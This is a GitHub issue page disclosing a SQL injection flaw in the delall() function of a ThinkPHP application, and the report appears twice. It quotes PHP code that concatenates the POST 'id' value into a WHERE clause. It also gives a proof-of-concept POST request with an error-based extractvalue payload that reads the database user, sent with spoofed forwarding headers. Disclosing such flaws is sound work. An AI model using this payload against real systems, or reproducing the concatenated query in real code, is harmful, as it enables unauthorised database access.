Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
line: 157 - 196 ` public function delall(){ //dump($_POST); //exit; $m=D('Advert'); //数据库表,配置文件中定义了表前缀,这里则不需要写 $id = I('post.id'); //dump($id); //exit; if ($id==null){ $this->error('请选择删除项!'); } //判断id是数组还是一个数值 if(is_array($id)){ $where = 'id in('.implode(',',$id).')'; //implode() 函数返回一个由数组元素组合成的字符串 }else{ $where = 'id='.$id; } //dump($where); //exit;
$m=M('Advert'); $arr=$m->where($where)->select(); foreach ($arr as $key => $value){ $images=$value['advert_image']; //dump($images); //exit; unlink('./Uploads/'.$images); } $count=$m->where($where)->delete(); //修改表单用save函数 if ($count>0){ $this->success("成功删除{$count}条!"); } else { $this->error('批量删除失败!'); } } `
Because the security syntax of thinkphp framework is not used here, and $id is used to splice the $where variable for query, resulting in a serious SQL injection vulnerability. May cause serious harm to the system.
poc: `POST /index.php/manage/kefu/delall HTTP/1.1 Host: www.tuzi.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2 x-forwarded-for: 8.8.8.8 x-originating-ip: 8.8.8.8 x-remote-ip: 8.8.8.8 x-remote-addr: 8.8.8.8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 73
id=1//and//(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))
`
The text was updated successfully, but these errors were encountered:
No branches or pull requests
line: 157 - 196
` public function delall(){
//dump($_POST);
//exit;
$m=D('Advert'); //数据库表,配置文件中定义了表前缀,这里则不需要写
$id = I('post.id');
//dump($id);
//exit;
if ($id==null){
$this->error('请选择删除项!');
}
//判断id是数组还是一个数值
if(is_array($id)){
$where = 'id in('.implode(',',$id).')';
//implode() 函数返回一个由数组元素组合成的字符串
}else{
$where = 'id='.$id;
}
//dump($where);
//exit;
Because the security syntax of thinkphp framework is not used here, and $id is used to splice the $where variable for query, resulting in a serious SQL injection vulnerability. May cause serious harm to the system.
poc:
`POST /index.php/manage/kefu/delall HTTP/1.1
Host: www.tuzi.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
id=1//and//(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))
`
The text was updated successfully, but these errors were encountered: